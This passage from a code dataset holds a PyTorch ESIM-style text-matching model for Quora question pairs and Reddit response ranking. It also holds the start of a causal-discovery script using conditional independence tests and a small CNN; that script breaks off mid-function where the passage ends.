"zope.component.getUtility", "line_number": 120, "usage_type": "call"}, {"api_name": "plone.i18n.normalizer.interfaces.IFileNameNormalizer", "line_number": 120, "usage_type": "argument"}, {"api_name": "zope.schema.vocabulary.SimpleVocabulary", "line_number": 130, "usage_type": "name"}, {"api_name": "plone.supermodel.model.Schema", "line_number": 139, "usage_type": "attribute"}, {"api_name": "plone.supermodel.model", "line_number": 139, "usage_type": "name"}, {"api_name": "zope.schema.Choice", "line_number": 143, "usage_type": "call"}, {"api_name": "zope.schema", "line_number": 143, "usage_type": "name"}, {"api_name": "opengever.oneoffixx._", "line_number": 144, "usage_type": "call"}, {"api_name": "opengever.base.schema.TableChoice", "line_number": 150, "usage_type": "call"}, {"api_name": "opengever.oneoffixx._", "line_number": 151, "usage_type": "call"}, {"api_name": "opengever.oneoffixx._", "line_number": 158, "usage_type": "call"}, {"api_name": "zope.schema.TextLine", "line_number": 163, "usage_type": "call"}, {"api_name": "zope.schema", "line_number": 163, "usage_type": "name"}, {"api_name": "opengever.oneoffixx._", "line_number": 164, "usage_type": "call"}, {"api_name": "z3c.form.form.Form", "line_number": 168, "usage_type": "name"}, {"api_name": "opengever.oneoffixx._", "line_number": 170, "usage_type": "call"}, {"api_name": "z3c.form.field.Fields", "line_number": 172, "usage_type": "call"}, {"api_name": "zope.i18n.translate", "line_number": 176, "usage_type": "call"}, {"api_name": "opengever.oneoffixx._", "line_number": 177, "usage_type": "call"}, {"api_name": "opengever.oneoffixx.command.CreateDocumentFromOneOffixxTemplateCommand", "line_number": 190, "usage_type": "call"}, {"api_name": "z3c.form.button.buttonAndHandler", "line_number": 193, "usage_type": "call"}, {"api_name": "z3c.form.button", "line_number": 193, "usage_type": "name"}, {"api_name": "opengever.oneoffixx._", "line_number": 193, "usage_type": "call"}, {"api_name": "z3c.form.button.buttonAndHandler", "line_number": 203, "usage_type": "call"}, {"api_name": "z3c.form.button", "line_number": 203, "usage_type": "name"}, {"api_name": 
"opengever.oneoffixx._", "line_number": 203, "usage_type": "call"}, {"api_name": "plone.z3cform.layout.FormWrapper", "line_number": 208, "usage_type": "name"}]} +{"seq_id": "125428796", "text": "import pdb\nimport sys\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\n\nsys.path.append(\"..\")\nfrom utils.misc import ixvr\n\nclass AttendFeedForward(nn.Module):\n\t\"\"\"\n\tSimiliar to the attend (Section 3.1) module of the DecAtt paper\n\t\"\"\"\n\tdef __init__(self, inp_size, hidden_size=200):\n\t\tsuper(AttendFeedForward, self).__init__()\n\n\t\tself.hidden_size = hidden_size\n\t\tself.linear = nn.Sequential( \\\n\t\t\tnn.Linear(inp_size, hidden_size), \\\n\t\t\tnn.ReLU(), \\\n\t\t\tnn.BatchNorm1d(num_features=hidden_size), \\\n\t\t\tnn.Linear(hidden_size, hidden_size), \\\n\t\t\tnn.ReLU(), \\\n\t\t\tnn.BatchNorm1d(num_features=hidden_size))\n\n\tdef forward(self, s1, s2, mask1, mask2):\n\t\t\"\"\"\n\t\tArgs:\n\t\t\ts1: Sentence 1 BiLSTM embeddings (b x LA x inp_size)\n\t\t\ts2: Sentence 2 BiLSTM embeddings (b x LB x inp_size)\n\t\t\tmask1: Sentence 1 mask (b x LA)\n\t\t\tmask2: Sentence 2 mask (b x LB)\n\t\tOutput:\n\t\t\talphas: Soft aligned combinations of s1 w.r.t. s2 tokens (b x maxlen x inp_size)\n\t\t\tbetas: Soft aligned combinations of s2 w.r.t. s1 tokens (b x maxlen x inp_size)\n\t\t\"\"\"\n\t\tbatch_size = s1.shape[0]\n\t\tmaxlen = s1.shape[1]\n\t\tinp_size = s1.shape[2]\n\n\t\th1 = self.linear(s1.view(-1, inp_size)).view(batch_size, maxlen, -1)\n\t\t# b x LA x hidden_size\n\t\th2 = self.linear(s2.view(-1, inp_size)).view(batch_size, maxlen, -1)\n\t\t# b x LB x hidden_size\n\t\th2t = torch.transpose(h2, 1, 2)\n\t\t# b x hidden_size x LB\n\n\t\te = torch.bmm(h1, h2t)\n\n\t\te_alpha = torch.mul(e, mask1.unsqueeze(-1))\n\t\te_alpha = torch.exp(e_alpha - torch.max(e_alpha, dim=1)[0].unsqueeze(1))\n\t\te_alpha = torch.div(e_alpha, torch.sum(e_alpha, dim=1).unsqueeze(1))\n\t\t# b x LA x LB\n\n\t\te_beta = torch.mul(e, mask2.unsqueeze(1))\n\t\te_beta = torch.exp(e_beta - torch.max(e_beta, dim=2)[0].unsqueeze(-1))\n\t\te_beta = torch.div(e_beta, torch.sum(e_beta, dim=2).unsqueeze(-1))\n\t\t# b x LA x LB\n\n\t\talphas = torch.bmm(torch.transpose(e_alpha, 1, 2), s1)\n\t\talphas = torch.mul(alphas, mask2.unsqueeze(-1))\n\t\t# b x LB x inp_size\n\t\tbetas = torch.bmm(e_beta, s2)\n\t\tbetas = torch.mul(betas, mask1.unsqueeze(-1))\n\t\t# b x LA x inp_size\n\n\t\treturn alphas, betas\n\nclass CompareFeedForward(nn.Module):\n\t\"\"\"\n\tSimilar to the compare (Section 3.2) module of the DecAtt paper\n\texcept instead of returning the sum of the embeddings v1 and v2\n\t(which might be susceptible to the length of the sequence),\n\tthis returns v1_avg, v1_max, v2_avg, v2_max.\n\t\"\"\"\n\tdef __init__(self, inp_size, hidden_size=200):\n\t\tsuper(CompareFeedForward, self).__init__()\n\n\t\tself.linear = nn.Sequential( \\\n\t\t\tnn.Linear(inp_size * 2, hidden_size), \\\n\t\t\tnn.ReLU(), \\\n\t\t\tnn.BatchNorm1d(num_features=hidden_size), \\\n\t\t\tnn.Linear(hidden_size, hidden_size), \\\n\t\t\tnn.ReLU(), \\\n\t\t\tnn.BatchNorm1d(num_features=hidden_size))\n\n\tdef forward(self, s1, s2, alphas, betas, mask1, mask2):\n\t\t\"\"\"\n\t\tArgs:\n\t\t\ts1: Sentence 1 BiLSTM embeddings (b x LA x inp_size)\n\t\t\ts2: Sentence 2 BiLSTM embeddings (b x LB x inp_size)\n\t\t\talphas: Aligned phrases (b x LB x inp_size)\n\t\t\tbetas: Aligned phrases (b x LA x inp_size)\n\t\t\tmask1: Sentence 1 mask (b x LA)\n\t\t\tmask2: Sentence 2 mask (b x 
LB)\n\t\tOutput:\n\t\t\tv1_avg: Comparison avg. pooled vector for aligned sentence s1 (b x hidden_size)\n\t\t\tv1_max: Comparison max. pooled vector for aligned sentence s1 (b x hidden_size)\n\t\t\tv2_avg: Comparison avg. pooled vector for aligned sentence s2 (b x hidden_size)\n\t\t\tv2_max: Comparison max. pooled vector for aligned sentence s2 (b x hidden_size)\n\t\t\"\"\"\n\t\tbatch_size = s1.shape[0]\n\t\tmaxlen = s1.shape[1]\n\t\tinp_size = s1.shape[2]\n\n\t\tin1 = torch.cat((s1, betas), dim=2)\n\t\t# b x LA x (inp_size * 2)\n\t\tin2 = torch.cat((s2, alphas), dim=2)\n\t\t# b x LB x (inp_size * 2)\n\n\t\tv1 = self.linear(in1.view(-1, inp_size * 2)).view(batch_size, maxlen, -1)\n\t\t# b x LA x hidden_size\n\t\tv1_avg = torch.sum(torch.mul(v1, mask1.unsqueeze(-1)), dim=1)\n\t\tv1_avg = torch.div(v1_avg, torch.sum(mask1, dim=1).unsqueeze(-1))\n\t\t# b x hidden_size\n\t\tv1_max = torch.max(torch.mul(v1, mask1.unsqueeze(-1)), dim=1)[0]\n\t\t# b x hidden_size\n\n\t\tv2 = self.linear(in2.view(-1, inp_size * 2)).view(batch_size, maxlen, -1)\n\t\t# b x LB x hidden_size\n\t\tv2_avg = torch.sum(torch.mul(v2, mask2.unsqueeze(-1)), dim=1)\n\t\tv2_avg = torch.div(v2_avg, torch.sum(mask2, dim=1).unsqueeze(-1))\n\t\t# b x hidden_size\n\t\tv2_max = torch.max(torch.mul(v2, mask2.unsqueeze(-1)), dim=1)[0]\n\t\t# b x hidden_size\n\n\t\treturn v1_avg, v1_max, v2_avg, v2_max\n\nclass ESIMBNMultiTask(nn.Module):\n\t\"\"\"\n\tModel architecture similar to the Enhanced Sequential Inference Model (ESIM)\n\tas described in https://arxiv.org/abs/1609.06038 without the Tree LSTM. This\n\tmodel also has BatchNorm layers for preventing overfitting instead of dropout\n\tlayers.\n\n\tThe BatchNorm order followed here is LIN -> ReLU -> BN even though the original\n\tpaper used BN before the non-linearity. 
Some online sources claim that BN after\n\tthe ReLU gives better results.\n\n\tThe model is designed for both Reddit response prediction task and Quora\n\tsemantic question matching task.\n\t\"\"\"\n\tdef __init__(self, hidden_size=200, glove_loader=None, pretrained_emb=True):\n\t\t\"\"\"\n\t\tArgs:\n\t\t\thidden_size: Size of the intermediate linear layers\n\t\t\tglove_loader: GLoVe embedding loader\n\t\t\tpretrained_emb: Use pretrained embeddings\n\t\t\"\"\"\n\t\tsuper(ESIMBNMultiTask, self).__init__()\n\n\t\tif not pretrained_emb:\n\t\t\traise NotImplementedError('always loads pretrained embeddings')\n\n\t\tword_vectors = glove_loader.word_vectors\n\t\tword_vectors = np.vstack(word_vectors)\n\t\tvocab_size = word_vectors.shape[0]\n\t\tembed_size = word_vectors.shape[1]\n\n\t\tself.embedding = nn.Embedding(vocab_size, embed_size)\n\t\tself.embedding.load_state_dict({'weight': torch.Tensor(word_vectors)})\n\t\tself.encoder = nn.LSTM(input_size=embed_size, hidden_size=hidden_size, num_layers=1, bidirectional=True)\n\t\tself.attend = AttendFeedForward(inp_size=hidden_size * 2, hidden_size=hidden_size)\n\t\tself.compare = CompareFeedForward(inp_size=hidden_size * 2, hidden_size=hidden_size)\n\n\t\t# prediction layer for the Quora task\n\t\tself.sts_pred = nn.Sequential( \\\n\t\t\tnn.Linear(hidden_size * 4, hidden_size), \\\n\t\t\tnn.ReLU(), \\\n\t\t\tnn.BatchNorm1d(num_features=hidden_size), \\\n\t\t\tnn.Linear(hidden_size, 2))\n\n\t\t# tranformation layer for the response\n\t\tself.response_transform = nn.Sequential( \\\n\t\t\tnn.Linear(hidden_size * 2, hidden_size * 2), \\\n\t\t\tnn.ReLU(), \\\n\t\t\tnn.BatchNorm1d(num_features=hidden_size * 2), \\\n\t\t\tnn.Linear(hidden_size * 2, hidden_size * 2), \\\n\t\t\tnn.BatchNorm1d(num_features=hidden_size * 2))\n\n\t\tself.reset_parameters()\n\n\tdef reset_parameters(self):\n\t\t\"\"\"Initialize network weights using Xavier init (with bias 0.01)\"\"\"\n\t\tself.apply(ixvr)\n\n\tdef forward(self, s1, s2, len1, len2):\n\t\t\"\"\"\n\t\tArgs:\n\t\t\ts1: Sentence 1 embeddings (b x LA)\n\t\t\ts2: Sentence 2 embeddings (b x LB)\n\t\t\tlen1: Sentence 1 length (b)\n\t\t\tlen2: Sentence 2 length (b)\n\t\t\"\"\"\n\t\tbatch_size = s1.shape[0]\n\t\tmaxlen = s1.shape[1]\n\n\t\ts1 = self.embedding(s1).transpose(0, 1)\n\t\ts1, _ = self.encoder(s1)\n\t\ts1 = torch.transpose(s1, 0, 1).contiguous()\n\t\t# b x LA x (hidden_size * 2)\n\t\ts2 = self.embedding(s2).transpose(0, 1)\n\t\ts2, _ = self.encoder(s2)\n\t\ts2 = torch.transpose(s2, 0, 1).contiguous()\n\t\t# b x LB x (hidden_size * 2)\n\n\t\tmask1 = torch.arange(0, maxlen).expand(batch_size, maxlen)\n\t\tif torch.cuda.is_available():\n\t\t\tmask1 = mask1.cuda()\n\t\tmask1 = mask1 < len1.unsqueeze(-1)\n\t\tmask2 = torch.arange(0, maxlen).expand(batch_size, maxlen)\n\t\tif torch.cuda.is_available():\n\t\t\tmask2 = mask2.cuda()\n\t\tmask2 = mask2 < len2.unsqueeze(-1)\n\n\t\tmask1 = mask1.float()\n\t\tmask2 = mask2.float()\n\n\t\talphas, betas = self.attend(s1, s2, mask1, mask2)\n\t\tv1_avg, v1_max, v2_avg, v2_max = self.compare(s1, s2, alphas, betas, mask1, mask2)\n\t\tassert batch_size > 1\n\t\tout = self.sts_pred(torch.cat((v1_avg, v1_max, v2_avg, v2_max), dim=1))\n\n\t\treturn out\n\n\tdef rank_responses(self, q, resp, len_q, len_resp):\n\t\t\"\"\"\n\t\tArgs:\n\t\t\tq: Reddit question embeddings (b x LA)\n\t\t\tresp: Reddit response candidates embeddings (b x K x LB)\n\t\t\tlen_q: Length of the input question (b)\n\t\t\tlen_resp: Length of the response candidates (b x K)\n\t\t\"\"\"\n\n\t\tbatch_size = 
q.shape[0]\n\t\tmaxlen = q.shape[1]\n\t\tK = resp.shape[1]\n\n\t\tq = self.embedding(q).transpose(0, 1)\n\t\tq, _ = self.encoder(q)\n\t\tq = torch.transpose(q, 0, 1).contiguous()\n\t\t# b x LA x (hidden_size * 2)\n\t\tresp = self.embedding(resp).view(batch_size * K, maxlen, -1).transpose(0, 1)\n\t\tresp, _ = self.encoder(resp)\n\t\tresp = torch.transpose(resp, 0, 1).view(batch_size, K, maxlen, -1).contiguous()\n\t\t# b x K x LB x (hidden_size * 2)\n\n\t\tmask1 = torch.arange(0, maxlen).expand(batch_size, maxlen)\n\t\tif torch.cuda.is_available():\n\t\t\tmask1 = mask1.cuda()\n\t\tmask1 = mask1 < len_q.unsqueeze(-1)\n\t\tmask1 = mask1.float()\n\t\t# b x LA\n\n\t\tmask2 = torch.arange(0, maxlen).expand(batch_size * K, maxlen)\n\t\tif torch.cuda.is_available():\n\t\t\tmask2 = mask2.cuda()\n\t\tmask2 = mask2 < len_resp.view(-1).unsqueeze(-1)\n\t\tmask2 = mask2.view(batch_size, K, -1).float()\n\t\t# b x K x LB\n\n\t\tq = q.unsqueeze(1).expand(-1, K, -1, -1).contiguous().view(batch_size * K, maxlen, -1)\n\t\t# (b * K) x LA x (hidden_size * 2)\n\t\tmask1 = mask1.unsqueeze(1).expand(-1, K, -1).contiguous().view(batch_size * K, maxlen)\n\t\t# (b * K) x LA\n\n\t\tresp = resp.view(batch_size * K, maxlen, -1)\n\t\t# (b * K) x LB x (hidden_size * 2)\n\t\tmask2 = mask2.view(batch_size * K, maxlen)\n\t\t# (b * K) x LB\n\n\t\talphas, betas = self.attend(q, resp, mask1, mask2)\n\t\tv1_avg, v1_max, v2_avg, v2_max = self.compare(q, resp, alphas, betas, mask1, mask2)\n\n\t\tv1 = torch.cat((v1_avg, v1_max), dim=1)\n\t\t# (b * K) x (hidden_size * 2)\n\t\tv2 = self.response_transform(torch.cat((v2_avg, v2_max), dim=1))\n\t\t# (b * K) x (hidden_size * 2)\n\n\t\tscores = torch.sum(torch.mul(v1, v2), dim=1).view(batch_size, -1)\n\t\t# b x K\n\n\t\treturn scores\n", "sub_path": "models/ESIMBNMultiTask.py", "file_name": "ESIMBNMultiTask.py", "file_ext": "py", "file_size_in_byte": 9601, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sys.path.append", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 24, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.transpose", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.bmm", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 52, 
"usage_type": "call"}, {"api_name": "torch.max", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.div", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.div", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.bmm", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.bmm", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 70, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 70, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 80, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 81, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 82, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 83, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 84, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 85, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 86, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.div", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 117, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 117, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 122, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 122, "usage_type": "call"}, {"api_name": "torch.div", "line_number": 123, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 123, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 125, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 125, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 130, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 130, "usage_type": "name"}, {"api_name": "numpy.vstack", "line_number": 157, "usage_type": "call"}, {"api_name": "torch.nn.Embedding", "line_number": 161, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 161, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 162, "usage_type": "call"}, {"api_name": "torch.nn.LSTM", "line_number": 163, "usage_type": "call"}, {"api_name": 
"torch.nn", "line_number": 163, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 168, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 168, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 169, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 169, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 170, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 170, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 171, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 171, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 172, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 172, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 175, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 175, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 176, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 176, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 177, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 177, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 178, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 178, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 179, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 179, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 180, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 180, "usage_type": "name"}, {"api_name": "utils.misc.ixvr", "line_number": 186, "usage_type": "argument"}, {"api_name": "torch.transpose", "line_number": 201, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 205, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 208, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 209, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 209, "usage_type": "attribute"}, {"api_name": "torch.arange", "line_number": 212, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 213, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 213, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 223, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 242, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 246, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 249, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 250, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 250, "usage_type": "attribute"}, {"api_name": "torch.arange", "line_number": 256, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 257, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 257, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 276, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 278, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 281, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 281, "usage_type": "call"}]} +{"seq_id": "11376249", "text": "import random\nimport torch\nimport torch.nn as nn\nfrom torch import optim\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import MinMaxScaler\nimport time\n\nfrom 
baselines.scripts_python.python_packages.pwNBCBk.tigramite.tigramite.independence_tests import CMIknn, ParCorr\n\n\nimport itertools\nfrom joblib import Parallel, delayed\n\n# from ctmi import window_representation, get_sampling_rate, align_matrix, tmi, get_alpha, window_size, align_pair\n# from ctmi_new import i_ctmi, ctmi\n# from gctmi import gctmi\n\nfrom baselines.scripts_python.python_packages.pwNBCBk.ctmi import window_representation, get_sampling_rate, align_matrix, tmi, get_alpha\nfrom baselines.scripts_python.python_packages.pwNBCBk.ctmi_new import ctmi, align_matrix, tmi, gamma_matrix_window_matrix, get_alpha\n# from gctmi import gctmi\n\nfrom datetime import datetime\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\n\nclass TestMI:\n def __init__(self, p_value= True):\n self.cd = CMIknn(mask_type=None, significance='shuffle_test', fixed_thres=None, sig_samples=10000,\n sig_blocklength=3, knn=10, confidence='bootstrap', conf_lev=0.9, conf_samples=10000,\n conf_blocklength=1, verbosity=0)\n self.p_value = p_value\n\n def fit(self, x, y, z=None):\n if len(x.shape) == 1:\n x = x.reshape(-1, 1)\n if len(y.shape) == 1:\n y = y.reshape(-1, 1)\n dim_x = x.shape[1]\n dim_y = y.shape[1]\n\n ws_xy = 1\n # y_past = y[:-ws_xy]\n # x = x[ws_xy:]#.reset_index(drop=True)\n # y = y[ws_xy:]#.reset_index(drop=True)\n\n if z is not None:\n # z = z[ws_xy:] # .reset_index(drop=True)\n # z = np.concatenate((z, y_past), axis=1)\n\n dim_z = z.shape[1]\n X = np.concatenate((x, y, z), axis=1)\n xyz = np.array([0] * dim_x + [1] * dim_y+ [2] * dim_z)\n else:\n # X = np.concatenate((x, y, y_past), axis=1)\n X = np.concatenate((x, y), axis=1)\n # xyz = np.array([0] * dim_x + [1] * dim_y + [2] * ws_xy)\n xyz = np.array([0] * dim_x + [1] * dim_y)\n value = self.cd.get_dependence_measure(X.T, xyz)\n if self.p_value:\n pvalue = self.cd.get_shuffle_significance(X.T, xyz, value)\n return pvalue, value\n else:\n return 0, value\n\n\nclass TestParCorr:\n def __init__(self):\n self.cd = ParCorr(mask_type=None, significance='shuffle_test', fixed_thres=None, sig_samples=10000,\n sig_blocklength=3, confidence='bootstrap', conf_lev=0.9, conf_samples=10000,\n conf_blocklength=1, verbosity=0)\n\n def fit(self, x, y, z=None):\n if len(x.shape) == 1:\n x = x.reshape(-1, 1)\n if len(y.shape) == 1:\n y = y.reshape(-1, 1)\n dim_x = x.shape[1]\n dim_y = y.shape[1]\n if z is not None:\n dim_z = z.shape[1]\n X = np.concatenate((x, y, z), axis=1)\n xyz = np.array([0] * dim_x + [1] * dim_y+ [2] * dim_z)\n else:\n X = np.concatenate((x, y), axis=1)\n xyz = np.array([0] * dim_x + [1] * dim_y)\n value = self.cd.get_dependence_measure(X.T, xyz)\n # pvalue = self.cd.get_shuffle_significance(X.T, xyz, value)\n pvalue = 0\n return pvalue, value\n\n\nclass tsCNN(nn.Module):\n def __init__(self, input_size, output_size, input_lag):\n super(tsCNN, self).__init__()\n self.input_size = input_size\n self.output_size = output_size\n self.input_lag = input_lag\n self.compact_ts = nn.Linear(input_lag, 1)\n self.compact_in = nn.Linear(int(input_size/input_lag), 1)\n # self.compact_in = nn.Linear(4, 2)\n self.conv1 = nn.Sequential(\n nn.Conv1d(\n in_channels=1,\n out_channels=input_size, # Some random number\n kernel_size=5,\n stride=1,\n padding=2,\n ),\n nn.ReLU(),\n nn.MaxPool1d(kernel_size=2), # size after pooling?\n )\n # self.conv2 = nn.Sequential(\n # nn.Conv1d(\n # in_channels=16,\n # out_channels=8,\n # kernel_size=5,\n # stride=1,\n # padding=2,\n # ),\n # nn.ReLU(),\n # nn.MaxPool1d(kernel_size=2),\n #\n # 
)\n        # self.compact_out = nn.Linear(8, 1)\n        # self.out_1 = nn.Linear(input_size*2*2, input_size*2)\n        # self.out_2 = nn.Linear(input_size*2, input_size)\n        self.out = nn.Linear(input_size, output_size)\n\n    def forward(self, x_dict):\n        # print(x.size())\n        compact_ts_dict = dict()\n        names = list(x_dict.keys())\n        for name in names:\n            x = x_dict[name].view(-1, self.input_lag)\n            compact_ts_i = self.compact_ts(x)\n            compact_ts_dict[name] = compact_ts_i\n            if name == names[0]:\n                compact_ts = compact_ts_i\n            else:\n                compact_ts = torch.cat((compact_ts, compact_ts_i), 1)\n        compact_in = self.compact_in(compact_ts)\n        x = compact_in.view(-1, 1, 1)\n        x = self.conv1(x)\n        # print(x.size())\n        # x = self.conv2(x)\n        # x = x.view(-1, self.input_size*2*2)\n        x = x.view(-1, self.input_size)\n        # compact_out = self.compact_out(x)\n        # output = self.out(compact_out)\n        # x = self.out_1(x)\n        # x = self.out_2(x)\n        output = self.out(x)\n        return output, compact_in, compact_ts_dict\n\n\ndef train(input_dict, target_tensor, model, optimizer, criterion):\n\n    optimizer.zero_grad()\n    # model.zero_grad()\n\n    output, _, _ = model(input_dict)\n    loss = criterion(output, target_tensor)\n\n    loss.backward()\n    optimizer.step()\n    return loss.item()\n\n\ndef predict(input_dict, model):\n    output, compact_out, compact_ts_dict = model(input_dict)\n    return output, compact_out, compact_ts_dict\n\n\n# Function to produce noise\ndef add_noise(x, d, order, beta=0.5):\n    x = x.copy()\n    rand = np.random.randint(0, high=d, size=x.shape[0])\n    for j in range(d):\n        proba = np.random.random(size=1)\n        if proba > beta:\n            for o in range(order-1):\n                i = j + o*d\n                x[i, rand[j]] = 0\n    return x\n\n\ndef mts_order(mts, order=4):\n    new_mts = pd.DataFrame()\n    for i in range(order):\n        if i == order:\n            i_data = mts[i:]\n        else:\n            i_data = mts[i:(-order + i)]\n        if isinstance(mts, pd.DataFrame):\n            names_col = mts.columns.values+ \"_\" + str(i + 1)\n        elif isinstance(mts, pd.Series):\n            names_col = mts.name + \"_\" + str(i + 1)\n        else:\n            print('error!')\n            exit(0)\n        for j in range(len(names_col)):\n            new_mts[names_col[j]] = i_data[mts.columns.values[j]].values\n    return new_mts\n\n\ndef tskiko_mv(data, max_lag, learning_rate, training_epoch, noise=True, alpha=0.05, cond_ind_test=\"ParCorr\",\n              verbose=True):\n    \"\"\"\n    :param data: input\n    :param max_lag: max_lag\n    :param learning_rate: learning rate of the autoencoder\n    :param training_epoch: number of training epochs\n    :param num_neurons: number of neurons in the hidden layer\n    :param noise: boolean value, if true a denoising autoencoder should be used\n    :param alpha:\n    :param cond_ind_test: CMI or ParCorr\n    :param verbose:\n    :return: dict\n    \"\"\"\n    # cond_ind_test = \"CMI\"\n    option = 1\n    # Start Causal ordering\n    start = time.time()\n\n    # scaler = MinMaxScaler(feature_range=(-1, 1))\n    # data = pd.DataFrame(scaler.fit_transform(data.values), columns=data.columns)\n    # data.columns = data.columns.values.astype(str)\n    d = data.shape[1]\n\n    x = mts_order(data, order=max_lag)  # [:-order]\n    names_x = x.columns[:-d]\n    # names_x = 